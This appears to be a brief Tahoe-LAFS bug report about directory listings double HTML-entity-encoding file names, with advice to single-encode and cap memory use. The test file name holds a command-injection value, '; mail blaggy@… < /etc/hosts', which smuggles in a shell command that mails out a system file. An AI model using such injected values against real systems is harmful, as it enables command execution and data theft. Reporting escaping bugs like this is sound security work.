My file “zumby-bumby ; mail blaggy@… < /etc/hosts” in the pubgrid root http://pubgrid.tahoe-lafs.org/uri/URI%3ADIR2%3Actmtx2awdo4xt77x5xxaz6nyxm%3An5t546ddvd6xlv4v6se6sjympbdbvo7orwizuzl42urm73sxazqa/ is listed as “zumby-bumby ; mail blaggy@… < /etc/hosts” in the listing.
That is, the < got converted to < and then that ampersand got converted to &. Thus, we end up with <.
HTML entity-encoding is good because it can stop XSS, but be careful: it increases the size of memory you have to allocate to handle the request. Also, double-encoding is just plain incorrect. Single-encode, and place limits on how much memory you will allocate to do the encoding. One way to do this is to include input size limits as part of your input validation framework.
DONE / Accepting payments